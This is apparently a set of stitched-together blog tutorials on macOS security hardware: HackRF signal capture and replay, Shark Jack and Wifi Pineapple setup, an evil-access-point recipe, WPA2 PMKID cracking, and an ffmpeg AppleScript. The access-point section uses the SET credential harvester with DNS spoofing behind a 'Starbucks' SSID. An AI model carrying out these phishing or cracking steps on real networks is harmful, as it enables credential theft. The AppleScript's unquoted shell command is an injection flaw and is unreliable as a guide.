This time it’s about installing HackRF One binaries on the macOS Big Sur. In another later tutorial I will dive deeper into macOS, HackRF ONE and GnuRadio (gnuradio-companion), but not yet. The installation takes place via latest MacPorts.
My first installation failed with a error (even as MacPorts where completely new installed and Command Line Tools where installed, too). I looked into log file and saw a issue with clang version.
# read log file (optional)
$ cat /opt/local/var/macports/logs/_opt_local_var_macports_sources_rsync.macports.org_macports_release_tarballs_ports_science_hackrf/hackrf/main.log
…
clang: error: invalid version number in 'MACOSX_DEPLOYMENT_TARGET=11.0'
…
# show clang version (optional)
$ clang --version
So looked it up on the Internet and saw that the clang version in the new SDK is higher and will solve this issue. To confirm I had a look installed SDK’s.
# list SDKs (optional)
$ ls /Library/Developer/CommandLineTools/SDKs/
MacOSX.sdk MacOSX10.14.sdk MacOSX10.15.sdk
To be really sure. Yes new SDK is installed.
# list SDKs (optional)
$ ls /Library/Developer/CommandLineTools/SDKs/
MacOSX.sdk MacOSX10.14.sdk MacOSX10.15.sdk MacOSX11.1.sdk
# show xcrun configs (optional)
$ xcrun --sdk macosx11.1 --show-sdk-path
$ xcrun --sdk macosx11.1 --show-sdk-version
Installation
After the installation and verification (yes the new sdk was getting installed), I tried the macPorts installation again.
# install hackrf via mac ports
$ sudo port install hackrf
Test installation
This time all went fine and I could start testing the device.
# show USB device info (optional)
$ ioreg -p IOUSB -l -w 0 -b
# show hackrf info
$ hackrf_info
# start debug (optional)
$ hackrf_debug --si5351c -n 0 -r
# start record
$ hackrf_transfer -r myRecord.raw -f 433780000
# start transmit record
$ hackrf_transfer -t myRecord.raw -f 433780000 -x 20
Many times I’v got asked (directly, via messages or forums) why the macOS internet connection does not work anymore, while using devices like Shark Jack, O.MG Cable and so on. In my tutorials I also did not mention this in detail, because I assumed this should be clear. A big mistake from my side. Therefore now this article. I will now do my best to explain, using a few examples, how to prioritize the services so that you do not lose your internet connection from your macOS. I will use the internet connection via Wifi hotspot.
Note: I show here an specific example for Shark Jack now. But main target is that you understand and can reuse your knowledge also for different other situations.
Network locations
The first part is about macOS network locations. To not destroy your current settings, we will create a new network location (all via command line).
Warning: The following steps will disconnect your internet connection (briefly), because the new created network location is not populated. Read the tutorial carefully before you execute any command!
# list all network locations
$ networksetup -listlocations
# show name of the current location
$ networksetup -getcurrentlocation
# create new location (SharkJackNetwork)
$ networksetup -createlocation SharkJackNetwork
# change location
$ networksetup -switchtolocation SharkJackNetwork
# lists network interfaces (should be empty)
$ networksetup -listallnetworkservices
Services
The newly created network location does not contain any service now. In the next second part we create two (Wifi and Bluetooth), set own DNS server and test. If you have stored your Wifi credentials (see Keychain Access.app), the internet connection will automatically established again.
# list all hardware ports with corresponding device name and port
$ networksetup -listallhardwareports
# create WI-FI service (named WLAN)
$ networksetup -createnetworkservice WLAN "WI-FI"
# create Bluetooth PAN service (named Bluetooth)
$ networksetup -createnetworkservice Bluetooth "Bluetooth PAN"
# lists network interfaces (WLAN and Bluetooth)
$ networksetup -listallnetworkservices
# add dns server (to WLAN)
$ networksetup -setdnsservers WLAN 8.8.8.8 8.8.4.4
# verify DNS settings (optional)
$ dig +all example.com
My MacBook Pro does not provide an RJ45 interface (only USB-C). Therefore I buyed a Multi-Port-Adapter from Satechi. After plug in, I add this device now to my services. There are many other vendors as well, for such please choose your own name.
# list all hardware ports with corresponding device name and port
$ networksetup -listallhardwareports
# create adapter service (named Satechi)
$ networksetup -createnetworkservice Satechi "USB 10/100/1000 LAN"
Now it’s time to use Shark Jack. Turn it on (arming mode), plug into adapter, wait for IP and test. If you haven’t changed it, the default IP is “172.16..24.1”, the user is “root” and password is “hak5shark”.
# wait for IP
$ ifconfig en8
# run command over SSH
$ ssh -C4 root@172.16.24.1 -C 'pwd'
# ping google dns
$ ping -c 1 google.com
The internet connection is not working anymore but Wifi seems working correctly!
Service order
Now it comes to the order of all services (prioritization). Here we ensure that internet connection works again.
# show services in the order they are contacted for a connection
$ networksetup -listnetworkserviceorder
# command to designate the order network services are contacted
$ networksetup -ordernetworkservices WLAN Satechi Bluetooth
# ping google dns
$ ping -c 1 google.com
All good now … The newly created network location (incl. services) can be used as soon you develop your Shark Jack payloads. Specific to your environment needs, you can create and use many of these network locations (to quickly switch between).
After you receive your new Shark Jack device from Hak5, you need to upgrade the Firmware. This tiny tutorial will guide you through the process. You should plan a maximum of 10 minutes of your life for this action.
Preparation
Enable the Arming mode (middle switch position) and connect with your RJ45 interface, also connect USB-C for charging. Do not stop charging while the whole upgrade process! In case your local device does not provide such interface, I have really good experience with the multiport adapter from SATECHI.
# download Firmware (via command line)
$ curl -L -C - https://downloads.hak5.org/api/devices/sharkjack/firmwares/1.1.0-stable -o ~/Downloads/upgrade-1.1.0.bin
# verify SHA256 checksum (optional)
$ shasum -a 256 ~/Downloads/upgrade-1.1.0.bin
# copy Firmware from local to Shark Jack device
$ scp -C4 ~/Downloads/upgrade-1.1.0.bin root@172.16.24.1:/tmp/
# SSH into SharkJack device
$ ssh -C4 root@172.16.24.1
# list directory content (optional)
root@shark:~# ls -la
# show current version
root@shark:~# cat VERSION
1.0
# start update
root@shark:~# sysupgrade -n /tmp/upgrade-1.1.0.bin
Now be patient and do not remove the Shark Jack from RJ45 or the USB-C for charging! The device installs the new firmware and reboots. For me it was around 3 – 4 minutes.
# check interface status (optional)
$ ifconfig
# SSH into Shark Jack device
$ ssh -C4 root@172.16.24.1
# show current version
root@shark:~# cat VERSION
1.1.0
With just a few steps it is possible to convert the MacBook into an evil access point. The device already has everything that is necessary in terms of hardware. For the additionally software only an Internet access is is required.
Note: The installation and configuration of Kali Linux VM (inside VirtualBox) is not part of this tutorial.
Objectives
Turn the macOS into wifi hotspot with fake DNS.
Starting position
Via cable (USB-C to Lightning) my MacBook and my IPhone are connected. On the IPhone the Hotspot (USB tethering) is enabled. The Wifi devices is off. Finally there is a Kali Linux VM and SSH access is configured in it.
Step 1: check current local config
Most of the following commands in the first step are optional, only your own IP is important. But this will give you a better understanding of your system.
# show local ip
$ ifconfig en7
[172.20.10.2]
# show system DNS configuration (optional)
$ scutil --dns | grep nameserver
# show network status (optional)
$ netstat -na | grep "\.53"
My interface is en7 and my local IP is 172.20.10.2. For you this can be different! The IPhone is my nameserver 172.20.10.1 (results of scutil) and no service is listen on port 53 (results of netstat).
Step 2: start Kali Linux and clone website
As already mentioned, we are now using the Kali Linux VM. The only important point for VM configuration is that the interface is mode “Bridged Network“.
# list all vm's
$ VBoxManage list vms
# start headless specific vm
$ VBoxManage startvm --type headless "KaliLinux"
# show running vm's (optional)
$ VBoxManage list runningvms
# get IP of vm
$ VBoxManage guestproperty get "KaliLinux" "/VirtualBox/GuestInfo/Net/0/V4/IP"
[172.20.10.3]
# SSH into VM
$ ssh <user>@172.20.10.3
# start setoolkit
$ sudo setoolkit
# select Social-Engineering Attacks
1) Social-Engineering Attacks
2) Penetration Testing (Fast-Track)
3) Third Party Modules
4) Update the Social-Engineer Toolkit
5) Update SET configuration
6) Help, Credits, and About
set> 1
# select Website Attack Vectors
1) Spear-Phishing Attack Vectors
2) Website Attack Vectors
3) Infectious Media Generator
4) Create a Payload and Listener
5) Mass Mailer Attack
6) Arduino-Based Attack Vector
7) Wireless Access Point Attack Vector
8) QRCode Generator Attack Vector
9) Powershell Attack Vectors
10) Third Party Modules
set> 2
# select Credential Harvester Attack Method
1) Java Applet Attack Method
2) Metasploit Browser Exploit Method
3) Credential Harvester Attack Method
4) Tabnabbing Attack Method
5) Web Jacking Attack Method
6) Multi-Attack Web Method
7) HTA Attack Method
set:webattack> 3
# select Site Cloner
1) Web Templates
2) Site Cloner
3) Custom Import
set:webattack> 2
After the inputs for IP (IP of VM) and domain (URL to clone) you should use an other tab (CMD + t) on your terminal. You can check the cloning result in your browser.
Step 3: clone, build, and run dnsmasq
Now dnsmasq is needed. You can install via brew or download and compile by your self.
# clone latest git repository
$ git clone git://thekelleys.org.uk/dnsmasq.git
# change into cloned directory
$ cd dnsmasq
# build dnsmasq binary
$ make
# show help for dnsmasq
$ sudo ./src/dnsmasq --help
# run dnsmasq
$ sudo ./src/dnsmasq --no-dhcp-interface= --no-daemon --log-queries --no-hosts --no-resolv --no-poll --server=8.8.8.8 --address="/example.com/172.20.10.3"
Dnsmasq runs without DHCP service, without reading /etc/hosts and /etc/resolv.conf. Google IP is given for upstream DNS server.
Step 4: test your DNS
And again you should use an other tab (CMD + t) on your terminal. Now you can verify the dnsmasq configuration.
# flush local DNS
$ sudo killall -HUP mDNSResponder
# dig on local IP
$ dig @172.20.10.2 +short example.com
# dig on localhost
$ dig @localhost +all example.com
# nslookup on local
$ nslookup login.example.com 172.20.10.2
Step 5: create access point
Set the DNS server for the Wi-Fi service and then start the hotspot.
# set DNS server
$ networksetup -setdnsservers Wi-Fi 172.20.10.2
My favorite SSID: Starbucks
Now it’s time to wait… In the meantime, you can find out more about your connected STA’s.
# show STA informations (optional)
$ cat /private/var/db/dhcpd_leases
Some weeks ago I wrote the first part about Internet Sharing. There we changed the network configuration on the Wifi Pineapple itself. This time we tweak the network configuration (NAT subnet configurations) so that we can use internet sharing on macOS inside “172.16.42.x” network.
Objectives
Configure Internet Sharing without changing the default settings on Wifi Pineapple (but change defaults on macOS).
Step 1: Prepare for next steps
If you have “Internet Sharing” enabled, now you must switch it off!
Turn on the Wifi Pineapple device and connect via USB (A plug for NANO, ETH plug for TETRA) to your Mac. If everything works fine, following commands should run successful.
The property list (com.apple.nat.plist) is like a contract between the “Sharing preferences pane” and “InternetSharing”. One important property to set there is “SharingNetworkNumberStart” (all other properties, which follow in this tutorial, are optional). This property controls the behavior of InternetSharing when it configures IP addresses for the local interfaces. I choose value 172.16.42.10.
# read the property list (optional)
$ defaults read /Library/Preferences/SystemConfiguration/com.apple.nat.plist
# create backup of the property list file (optional)
$ sudo cp /Library/Preferences/SystemConfiguration/com.apple.nat.plist /Library/Preferences/SystemConfiguration/com.apple.nat.plist.bak
# add start IP
$ sudo defaults write /Library/Preferences/SystemConfiguration/com.apple.nat NAT -dict-add SharingNetworkNumberStart 172.16.42.10
# add end IP (optional)
$ sudo defaults write /Library/Preferences/SystemConfiguration/com.apple.nat NAT -dict-add SharingNetworkNumberEnd 172.16.42.100
# add network mask (optional)
$ sudo defaults write /Library/Preferences/SystemConfiguration/com.apple.nat NAT -dict-add SharingNetworkMask 255.255.255.0
Step 3: Network configuration
We will deal with 2 interfaces locally (enX and bridge100). Now we configure the “enX” IP first. We do this simply via “Network preferences”. Depending to your Wifi Pineapple device you should see following services:
NANO: AX88x72A
TETRA: USB 10/100 LAN
Select the service and configure like in picture.
Now change the network service order.
After saving, we quickly check everything.
# check interface (in my case it's en5)
$ ifconfig en5
...
inet 172.16.42.10 netmask 0xffffff00 broadcast 172.16.42.255
# ping from wifi pineapple (should not work yet)
$ ssh root@172.16.42.1 -C 'ping -c 1 google.com'
...
ping: sendto: Network unreachable
# check for interface (should not exist)
$ ifconfig bridge100
...
ifconfig: interface bridge100 does not exist
Step 4: Start Internet Sharing
Inside “System Preferences”, click “Sharing”, then select “Internet Sharing”. Configure as in picture.
Step 5: Set bridge100 interface IP
Back to the terminal, here the interface “bridge100” should be visible now. This interface we assign the IP 172.16.42.42.
# show interface information (optional)
$ ifconfig bridge100
# add IP to bridge100 interface
$ sudo ifconfig bridge100 172.16.42.42 netmask 255.255.255.0 up
That’s it already! Via “Bulletins” you can verify.
BTW … Take a look at the following local files, with and without Internet sharing!
# read config file for DHCP
$ defaults read /etc/bootpd.plist
# read internet share config (optional)
$ defaults read /System/Library/LaunchDaemons/com.apple.NetworkSharing.plist
With very little effort and a few tools, you can crack WPA2 WiFi passwords on your macOS. This tutorial will show you how to do it. Bettercap, hcxpcaptool (via Docker) and hashcat are used for this. Please note that these instructions are only used for learning purposes!
Note: In this guide we don’t change the default credentials (user,pass). You can do on file “/usr/local/share/bettercap/caplets/http-ui.cap”!
Open the Browser (http://127.0.0.1:80), login and start Wifi discovery (wifi.recon on). Send some association requests to the selected BSSID (wifi.assoc BSSID). In your home folder you should find the file “bettercap-wifi-handshakes.pcap”.
Finish your Bettercap session when you are done.
Wireshark
Optional you can use Wireshark to verify, if you recorded the PMKID on Robust Secure Network (RSN). Start Wireshark, open the file “bettercap-wifi-handshakes.pcap”, add the filter “eapol && wlan.rsn.ie.pmkid” and search the PMKID(s).
hcxpcaptool
Now you need to convert (extract) the PMKID(s) from the Bettercap pcap file. For this you need the “hcxdumptool” from ZeraBea. Because OpenSSL is needed (and I don’t want to install it), I created a small Alpine Docker image (Dockerfile). You can follow next steps for usage.
# pull the image
$ docker pull slorenz/hcxpcaptool
# create directories
$ mkdir -p ~/Projects/PMKID/cap
# change directory
$ cd ~/Projects/PMKID/
# copy pcap into cap directory
$ cp ~/bettercap-wifi-handshakes.pcap ~/Projects/PMKID/cap/
# run container
$ docker run -ti --rm --mount src="$(pwd)/cap",target=/hcxpcaptool,type=bind slorenz/hcxpcaptool bettercap-wifi-handshakes.pcap
# show content (optional)
$ cat cap/pmkid.16800
Note: The columns (of pmkid.16800 content) are divided by * into following:
PMKID
MAC AP
MAC Station
ESSID
If you have not four columns, you need to repeat all previous steps for recording and convert!
hashcat
That was actually the easy part. Now we use Hashcat to crack the WPA2 passwords. The “only” challenge is the password length and the characters used. The next steps will guide you:
# create directory
$ mkdir -p ~/Projects
# change directory
$ cd ~/Projects
# clone git repository of hashcat
$ git clone https://github.com/hashcat/hashcat.git
# build binary
$ make -C hashcat/
# install binary
$ sudo make install -C hashcat/
# delete cloned repository (optional)
$ rm -fr ~/Projects/hashcat
# show hashcat help (optional)
$ hashcat -h
# run benchmark (optional)
$ hashcat -b
# execute hashcat
$ hashcat -m 16800 pmkid.16800 -a 3 -w 3 '?l?l?l?l?l?lt!'
I have been using the Wifi Pineapple Nano by Hak5 for a long time. What can I say – very, very cool tiny device. Since I am also a macOS user, I would like to show in this tutorial how I share my internet (Wifi to USB). There are various options but with this I have currently achieved the best results.
Important: You should carry out all firmware upgrades beforehand, since the settings (which I will show you soon) will be overwritten again.
Objectives
I would like to connect my Macbook to the Internet via WiFi and then make it available to the Wifi Pineapple via USB. So here both devices should be able to use the Internet without network conflicts.
Change Wifi Pineapple network
# show interface configuration (optional)
$ ifconfig
# connect to Pineapple device via SSH
$ ssh root@172.16.42.1
# backup network file
$ cp /etc/config/network /etc/config/network.bak
# show all settings (optional)
$ uci show
# show network settings (optional)
$ uci show network
# change ip with UCI configuration tool
$ uci set network.lan.ipaddr='192.168.2.10'
# change gateway with UCI configuration tool
$ uci set network.lan.gateway='192.168.2.1'
# save changes
$ uci commit
# reboot device
$ reboot
The first steps of the configuration have been carried out. However, you still cannot connect to the device or share the internet!
Modify macOS network configuration
Now you have to configure the macos network dhcp with manual address (network.lan.gateway 192.168.2.1). To do this, open the network settings and select the Wifi Pineapple (AX88x72A). Select “DHCP with manual address” in the dropdown and assign the IP (next to Configure IPv4).
You should also change the arrangement of your available network connections (devices). Click the gear icon and select “Set Service Order”. At the top should be the standard wifi followed by Wifi Pineapple.
After a short time, the settings should have been accepted.
Wifi to USB internet sharing
Now we are making the internet available from Wifi to Wifi Pineapple (USB). Launch Internet Sharing under System Preferences. On “Share your connection from” select the Wifi and on “To computers using” select the Wifi Pineapple.
Done … let’s verify all configurations.
# show interface configuration (optional)
$ ifconfig
# connect to Pineapple via SSH
$ ssh root@192.168.2.10
# run simple ping (optional)
$ ping -c 1 google.com
# exit SSH connection to Pineapple
$ exit
# open browser
$ open http://192.168.2.10:1471
Note: The Browser URL is now http://192.168.2.10:1471 (network.lan.ipaddr 192.168.2.10)!
After login you can go to the Dashboard and check “Bulletins” which should show the latest news from wifipineapple.com.
Usually I work via Terminal but sometimes I don’t remember all parameters of a binary and search for such takes time. Same issue I had for ffmpeg downloads of M3U8 files. So I created a small apple script (for some dialogs) and saved this as very simple application. I use it regulary now and after all I thought to share here.
Preparation
A little preparation is needed, if you have ffmpeg binary allready installed you can skip to next section. So download the ffmpeg binary as an archive from https://www.ffmpeg.org/, unzip and follow next commands. In my example the binary was unzipped into folder “Downloads”.
Open the Scripteditor and copy/paste the following script there.
#!/usr/bin/osascript
global theURL
global theOutputFolder
global theOutputFileName
on SetURL()
set theTitle to "Video URL"
try
set theURLDialog to display dialog "What's the file URL?" default answer "" with title theTitle buttons {"Continue"}
set theURL to text returned of theURLDialog
on error
quit
end try
if theURL as string is equal to "" then
quit
end if
end SetURL
on SetOutputFolder()
try
set theOutputFolder to choose folder with prompt "In what folder you will save the file?"
on error
quit
end try
end SetOutputFolder
on SetOutputFileName()
set theTitle to "File Name"
try
set theOutputFileNameDialog to display dialog "What's your target file name?" default answer "" with title theTitle buttons {"Continue"}
set theOutputFileName to text returned of theOutputFileNameDialog
on error
quit
end try
if theOutputFileName as string is equal to "" then
quit
end if
end SetOutputFileName
on RunTerminal()
set theTargetPath to POSIX path of theOutputFolder & theOutputFileName
set theCommand to "ffmpeg -i " & theURL & " -c copy -bsf:a aac_adtstoasc " & theTargetPath
tell application "Terminal"
activate
do script with command theCommand in window 1
end tell
end RunTerminal
on quit
display dialog "Thanks for trying this!" buttons {"Continue"}
continue quit
end quit
on run
SetURL()
SetOutputFolder()
SetOutputFileName()
RunTerminal()
end run
Export
Now you can “save” or “export” the script as “app”.
Save/Export AppleScript as app
If you don’t like the icon, you can change it. Download from the source of you choose an “.icns” file. Select the app and hit “Command + i” keys. Now drag the icon over the original icon and close info window. Ready … move it into Applications folder and use it.
